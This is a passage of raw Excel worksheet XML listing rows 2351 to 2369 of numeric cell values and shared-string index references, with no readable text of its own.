        <v>16760</v>
      </c>
    </row>
    <row r="2351" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2351" s="12">
        <v>11583</v>
      </c>
      <c r="B2351" s="12" t="s">
        <v>31235</v>
      </c>
      <c r="D2351" s="12" t="s">
        <v>31228</v>
      </c>
      <c r="E2351" s="12" t="s">
        <v>31491</v>
      </c>
      <c r="F2351" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2351" s="12" t="s">
        <v>16761</v>
      </c>
      <c r="H2351" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2351" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2351" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K2351" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2351" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2351" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2351" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2351" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2351" s="12" t="s">
        <v>7001</v>
      </c>
      <c r="Q2351" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2351" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2351" s="12" t="s">
        <v>16762</v>
      </c>
      <c r="T2351" s="12" t="s">
        <v>16763</v>
      </c>
      <c r="U2351" s="12" t="s">
        <v>16764</v>
      </c>
      <c r="V2351" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W2351" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2351" s="12">
        <v>16</v>
      </c>
      <c r="Y2351" s="12" t="s">
        <v>16765</v>
      </c>
    </row>
    <row r="2352" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2352" s="12">
        <v>11586</v>
      </c>
      <c r="B2352" s="12" t="s">
        <v>31235</v>
      </c>
      <c r="D2352" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2352" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2352" s="12" t="s">
        <v>16766</v>
      </c>
      <c r="H2352" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2352" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2352" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K2352" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2352" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2352" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2352" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2352" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2352" s="12" t="s">
        <v>7014</v>
      </c>
      <c r="Q2352" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2352" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2352" s="12" t="s">
        <v>16767</v>
      </c>
      <c r="T2352" s="12" t="s">
        <v>16768</v>
      </c>
      <c r="U2352" s="12" t="s">
        <v>16769</v>
      </c>
      <c r="V2352" s="12" t="s">
        <v>5335</v>
      </c>
      <c r="W2352" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2352" s="12">
        <v>15</v>
      </c>
      <c r="Y2352" s="12" t="s">
        <v>16770</v>
      </c>
    </row>
    <row r="2353" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2353" s="12">
        <v>11590</v>
      </c>
      <c r="B2353" s="12" t="s">
        <v>30686</v>
      </c>
      <c r="D2353" s="12" t="s">
        <v>30687</v>
      </c>
      <c r="E2353" s="12" t="s">
        <v>31491</v>
      </c>
      <c r="F2353" s="12" t="s">
        <v>30697</v>
      </c>
      <c r="G2353" s="12" t="s">
        <v>16776</v>
      </c>
      <c r="H2353" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2353" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2353" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K2353" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2353" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2353" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2353" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2353" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2353" s="12" t="s">
        <v>14994</v>
      </c>
      <c r="Q2353" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2353" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2353" s="12" t="s">
        <v>16777</v>
      </c>
      <c r="T2353" s="12" t="s">
        <v>16778</v>
      </c>
      <c r="U2353" s="12" t="s">
        <v>16779</v>
      </c>
      <c r="V2353" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W2353" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2353" s="12">
        <v>5</v>
      </c>
      <c r="Y2353" s="12" t="s">
        <v>16780</v>
      </c>
    </row>
    <row r="2354" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2354" s="12">
        <v>11594</v>
      </c>
      <c r="B2354" s="12" t="s">
        <v>31285</v>
      </c>
      <c r="D2354" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2354" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2354" s="12" t="s">
        <v>31284</v>
      </c>
      <c r="G2354" s="12" t="s">
        <v>16781</v>
      </c>
      <c r="H2354" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2354" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2354" s="12" t="s">
        <v>1511</v>
      </c>
      <c r="K2354" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2354" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2354" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2354" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2354" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2354" s="12" t="s">
        <v>16409</v>
      </c>
      <c r="Q2354" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2354" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2354" s="12" t="s">
        <v>16782</v>
      </c>
      <c r="T2354" s="12" t="s">
        <v>16783</v>
      </c>
      <c r="U2354" s="12" t="s">
        <v>16784</v>
      </c>
      <c r="V2354" s="12" t="s">
        <v>3399</v>
      </c>
      <c r="W2354" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2354" s="12">
        <v>7</v>
      </c>
      <c r="Y2354" s="12" t="s">
        <v>16785</v>
      </c>
    </row>
    <row r="2355" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2355" s="12">
        <v>11596</v>
      </c>
      <c r="B2355" s="12" t="s">
        <v>30472</v>
      </c>
      <c r="D2355" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2355" s="12" t="s">
        <v>30475</v>
      </c>
      <c r="G2355" s="12" t="s">
        <v>16786</v>
      </c>
      <c r="H2355" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2355" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2355" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K2355" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2355" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2355" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2355" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2355" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2355" s="12" t="s">
        <v>16787</v>
      </c>
      <c r="Q2355" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2355" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2355" s="12" t="s">
        <v>16788</v>
      </c>
      <c r="T2355" s="12" t="s">
        <v>11991</v>
      </c>
      <c r="U2355" s="12" t="s">
        <v>16789</v>
      </c>
      <c r="V2355" s="12" t="s">
        <v>3095</v>
      </c>
      <c r="W2355" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2355" s="12">
        <v>14</v>
      </c>
      <c r="Y2355" s="12" t="s">
        <v>16790</v>
      </c>
    </row>
    <row r="2356" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2356" s="12">
        <v>11598</v>
      </c>
      <c r="B2356" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2356" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2356" s="12" t="s">
        <v>31491</v>
      </c>
      <c r="F2356" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2356" s="12" t="s">
        <v>16791</v>
      </c>
      <c r="H2356" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2356" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2356" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K2356" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2356" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2356" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2356" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2356" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2356" s="12" t="s">
        <v>16792</v>
      </c>
      <c r="Q2356" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2356" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2356" s="12" t="s">
        <v>16793</v>
      </c>
      <c r="T2356" s="12" t="s">
        <v>16794</v>
      </c>
      <c r="U2356" s="12" t="s">
        <v>16795</v>
      </c>
      <c r="V2356" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W2356" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2356" s="12">
        <v>9</v>
      </c>
      <c r="Y2356" s="12" t="s">
        <v>16796</v>
      </c>
    </row>
    <row r="2357" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2357" s="12">
        <v>11602</v>
      </c>
      <c r="B2357" s="12" t="s">
        <v>30686</v>
      </c>
      <c r="D2357" s="12" t="s">
        <v>30687</v>
      </c>
      <c r="E2357" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2357" s="12" t="s">
        <v>30698</v>
      </c>
      <c r="G2357" s="12" t="s">
        <v>16797</v>
      </c>
      <c r="H2357" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2357" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2357" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K2357" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2357" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2357" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2357" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2357" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2357" s="12" t="s">
        <v>14994</v>
      </c>
      <c r="Q2357" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2357" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2357" s="12" t="s">
        <v>16798</v>
      </c>
      <c r="T2357" s="12" t="s">
        <v>11446</v>
      </c>
      <c r="U2357" s="12" t="s">
        <v>16799</v>
      </c>
      <c r="V2357" s="12" t="s">
        <v>4936</v>
      </c>
      <c r="W2357" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2357" s="12">
        <v>12</v>
      </c>
      <c r="Y2357" s="12" t="s">
        <v>16800</v>
      </c>
    </row>
    <row r="2358" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2358" s="12">
        <v>11611</v>
      </c>
      <c r="B2358" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2358" s="12" t="s">
        <v>30197</v>
      </c>
      <c r="F2358" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2358" s="12" t="s">
        <v>16801</v>
      </c>
      <c r="H2358" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2358" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J2358" s="12" t="s">
        <v>153</v>
      </c>
      <c r="K2358" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2358" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2358" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2358" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2358" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2358" s="12" t="s">
        <v>16802</v>
      </c>
      <c r="Q2358" s="12" t="s">
        <v>28337</v>
      </c>
      <c r="R2358" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2358" s="12" t="s">
        <v>16803</v>
      </c>
      <c r="T2358" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2358" s="12" t="s">
        <v>16804</v>
      </c>
      <c r="V2358" s="12" t="s">
        <v>4748</v>
      </c>
      <c r="W2358" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2358" s="12">
        <v>1</v>
      </c>
      <c r="Y2358" s="12" t="s">
        <v>16805</v>
      </c>
    </row>
    <row r="2359" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2359" s="12">
        <v>11629</v>
      </c>
      <c r="B2359" s="12" t="s">
        <v>30304</v>
      </c>
      <c r="D2359" s="12" t="s">
        <v>30305</v>
      </c>
      <c r="E2359" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F2359" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2359" s="12" t="s">
        <v>16806</v>
      </c>
      <c r="H2359" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2359" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2359" s="12" t="s">
        <v>4248</v>
      </c>
      <c r="K2359" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2359" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2359" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2359" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2359" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2359" s="12" t="s">
        <v>16807</v>
      </c>
      <c r="Q2359" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2359" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2359" s="12" t="s">
        <v>16808</v>
      </c>
      <c r="T2359" s="12" t="s">
        <v>9838</v>
      </c>
      <c r="U2359" s="12" t="s">
        <v>16809</v>
      </c>
      <c r="V2359" s="12" t="s">
        <v>5099</v>
      </c>
      <c r="W2359" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2359" s="12">
        <v>11</v>
      </c>
      <c r="Y2359" s="12" t="s">
        <v>16810</v>
      </c>
    </row>
    <row r="2360" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2360" s="12">
        <v>11633</v>
      </c>
      <c r="B2360" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2360" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2360" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F2360" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2360" s="12" t="s">
        <v>16811</v>
      </c>
      <c r="H2360" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2360" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J2360" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K2360" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2360" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2360" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2360" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2360" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2360" s="12" t="s">
        <v>16812</v>
      </c>
      <c r="Q2360" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2360" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2360" s="12" t="s">
        <v>16813</v>
      </c>
      <c r="T2360" s="12" t="s">
        <v>16814</v>
      </c>
      <c r="U2360" s="12" t="s">
        <v>16815</v>
      </c>
      <c r="V2360" s="12" t="s">
        <v>6182</v>
      </c>
      <c r="W2360" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2360" s="12">
        <v>15</v>
      </c>
      <c r="Y2360" s="12" t="s">
        <v>16816</v>
      </c>
    </row>
    <row r="2361" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2361" s="12">
        <v>11634</v>
      </c>
      <c r="B2361" s="12" t="s">
        <v>30606</v>
      </c>
      <c r="C2361" s="12" t="s">
        <v>30607</v>
      </c>
      <c r="D2361" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2361" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F2361" s="12" t="s">
        <v>30584</v>
      </c>
      <c r="G2361" s="12" t="s">
        <v>16817</v>
      </c>
      <c r="H2361" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2361" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J2361" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K2361" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2361" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2361" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2361" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2361" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2361" s="12" t="s">
        <v>14994</v>
      </c>
      <c r="Q2361" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2361" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2361" s="12" t="s">
        <v>16818</v>
      </c>
      <c r="T2361" s="12" t="s">
        <v>12546</v>
      </c>
      <c r="U2361" s="12" t="s">
        <v>16819</v>
      </c>
      <c r="V2361" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W2361" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2361" s="12">
        <v>33</v>
      </c>
      <c r="Y2361" s="12" t="s">
        <v>16820</v>
      </c>
    </row>
    <row r="2362" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2362" s="12">
        <v>11636</v>
      </c>
      <c r="B2362" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2362" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2362" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2362" s="12" t="s">
        <v>16821</v>
      </c>
      <c r="H2362" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2362" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J2362" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K2362" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2362" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M2362" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N2362" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O2362" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2362" s="12" t="s">
        <v>7014</v>
      </c>
      <c r="Q2362" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2362" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2362" s="12" t="s">
        <v>16822</v>
      </c>
      <c r="T2362" s="12" t="s">
        <v>16823</v>
      </c>
      <c r="U2362" s="12" t="s">
        <v>16824</v>
      </c>
      <c r="V2362" s="12" t="s">
        <v>16825</v>
      </c>
      <c r="W2362" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2362" s="12">
        <v>22</v>
      </c>
      <c r="Y2362" s="12" t="s">
        <v>16826</v>
      </c>
    </row>
    <row r="2363" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2363" s="12">
        <v>11639</v>
      </c>
      <c r="B2363" s="12" t="s">
        <v>30314</v>
      </c>
      <c r="D2363" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2363" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2363" s="12" t="s">
        <v>16827</v>
      </c>
      <c r="H2363" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2363" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J2363" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K2363" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2363" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2363" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2363" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2363" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2363" s="12" t="s">
        <v>16828</v>
      </c>
      <c r="Q2363" s="12" t="s">
        <v>28332</v>
      </c>
      <c r="R2363" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2363" s="12" t="s">
        <v>16829</v>
      </c>
      <c r="T2363" s="12" t="s">
        <v>16830</v>
      </c>
      <c r="U2363" s="12" t="s">
        <v>16831</v>
      </c>
      <c r="V2363" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W2363" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2363" s="12">
        <v>3</v>
      </c>
      <c r="Y2363" s="12" t="s">
        <v>16832</v>
      </c>
    </row>
    <row r="2364" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2364" s="12">
        <v>11640</v>
      </c>
      <c r="B2364" s="12" t="s">
        <v>31237</v>
      </c>
      <c r="C2364" s="12" t="s">
        <v>31238</v>
      </c>
      <c r="D2364" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2364" s="12" t="s">
        <v>31236</v>
      </c>
      <c r="G2364" s="12" t="s">
        <v>16833</v>
      </c>
      <c r="H2364" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2364" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2364" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K2364" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2364" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2364" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2364" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2364" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2364" s="12" t="s">
        <v>16834</v>
      </c>
      <c r="Q2364" s="12">
        <v>2.4</v>
      </c>
      <c r="R2364" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2364" s="12" t="s">
        <v>16835</v>
      </c>
      <c r="T2364" s="12" t="s">
        <v>2925</v>
      </c>
      <c r="U2364" s="12" t="s">
        <v>13017</v>
      </c>
      <c r="V2364" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W2364" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2364" s="12">
        <v>11</v>
      </c>
      <c r="Y2364" s="12" t="s">
        <v>16836</v>
      </c>
    </row>
    <row r="2365" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2365" s="12">
        <v>11647</v>
      </c>
      <c r="B2365" s="12" t="s">
        <v>31286</v>
      </c>
      <c r="D2365" s="12" t="s">
        <v>31287</v>
      </c>
      <c r="F2365" s="12" t="s">
        <v>31272</v>
      </c>
      <c r="G2365" s="12" t="s">
        <v>16841</v>
      </c>
      <c r="H2365" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2365" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2365" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K2365" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2365" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2365" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2365" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2365" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2365" s="12" t="s">
        <v>12737</v>
      </c>
      <c r="Q2365" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2365" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2365" s="12" t="s">
        <v>16842</v>
      </c>
      <c r="T2365" s="12" t="s">
        <v>16843</v>
      </c>
      <c r="U2365" s="12" t="s">
        <v>16844</v>
      </c>
      <c r="V2365" s="12" t="s">
        <v>5413</v>
      </c>
      <c r="W2365" s="12">
        <v>11557</v>
      </c>
      <c r="X2365" s="12">
        <v>11</v>
      </c>
      <c r="Y2365" s="12" t="s">
        <v>16845</v>
      </c>
    </row>
    <row r="2366" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2366" s="12">
        <v>11648</v>
      </c>
      <c r="B2366" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D2366" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F2366" s="12" t="s">
        <v>30699</v>
      </c>
      <c r="G2366" s="12" t="s">
        <v>16846</v>
      </c>
      <c r="H2366" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2366" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2366" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K2366" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2366" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2366" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2366" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2366" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2366" s="12" t="s">
        <v>16726</v>
      </c>
      <c r="Q2366" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2366" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2366" s="12" t="s">
        <v>16847</v>
      </c>
      <c r="T2366" s="12" t="s">
        <v>2404</v>
      </c>
      <c r="U2366" s="12" t="s">
        <v>16848</v>
      </c>
      <c r="V2366" s="12" t="s">
        <v>10538</v>
      </c>
      <c r="W2366" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2366" s="12">
        <v>5</v>
      </c>
      <c r="Y2366" s="12" t="s">
        <v>16849</v>
      </c>
    </row>
    <row r="2367" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2367" s="12">
        <v>11649</v>
      </c>
      <c r="B2367" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C2367" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D2367" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E2367" s="12" t="s">
        <v>31491</v>
      </c>
      <c r="F2367" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G2367" s="12" t="s">
        <v>28372</v>
      </c>
      <c r="H2367" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2367" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J2367" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K2367" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2367" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M2367" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N2367" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O2367" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2367" s="12" t="s">
        <v>16726</v>
      </c>
      <c r="Q2367" s="12" t="s">
        <v>28309</v>
      </c>
      <c r="R2367" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2367" s="12" t="s">
        <v>16850</v>
      </c>
      <c r="T2367" s="12" t="s">
        <v>16851</v>
      </c>
      <c r="U2367" s="12" t="s">
        <v>16852</v>
      </c>
      <c r="V2367" s="12" t="s">
        <v>1245</v>
      </c>
      <c r="W2367" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2367" s="12">
        <v>20</v>
      </c>
      <c r="Y2367" s="12" t="s">
        <v>16853</v>
      </c>
    </row>
    <row r="2368" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2368" s="12">
        <v>11654</v>
      </c>
      <c r="B2368" s="12" t="s">
        <v>30686</v>
      </c>
      <c r="D2368" s="12" t="s">
        <v>30687</v>
      </c>
      <c r="E2368" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F2368" s="12" t="s">
        <v>30700</v>
      </c>
      <c r="G2368" s="12" t="s">
        <v>16854</v>
      </c>
      <c r="H2368" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I2368" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J2368" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K2368" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L2368" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M2368" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N2368" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O2368" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P2368" s="12" t="s">
        <v>16156</v>
      </c>
      <c r="Q2368" s="12" t="s">
        <v>28271</v>
      </c>
      <c r="R2368" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S2368" s="12" t="s">
        <v>16855</v>
      </c>
      <c r="T2368" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U2368" s="12" t="s">
        <v>16856</v>
      </c>
      <c r="V2368" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W2368" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X2368" s="12">
        <v>2</v>
      </c>
      <c r="Y2368" s="12" t="s">
        <v>16350</v>
      </c>
    </row>
    <row r="2369" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A2369" s="12">
        <v>11659</v>
      </c>
      <c r="B2369" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D2369" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E2369" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F2369" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G2369" s="12" t="s">
        <v>16857</v>
      </c>
      <c r="H2369" s="12" t="s">
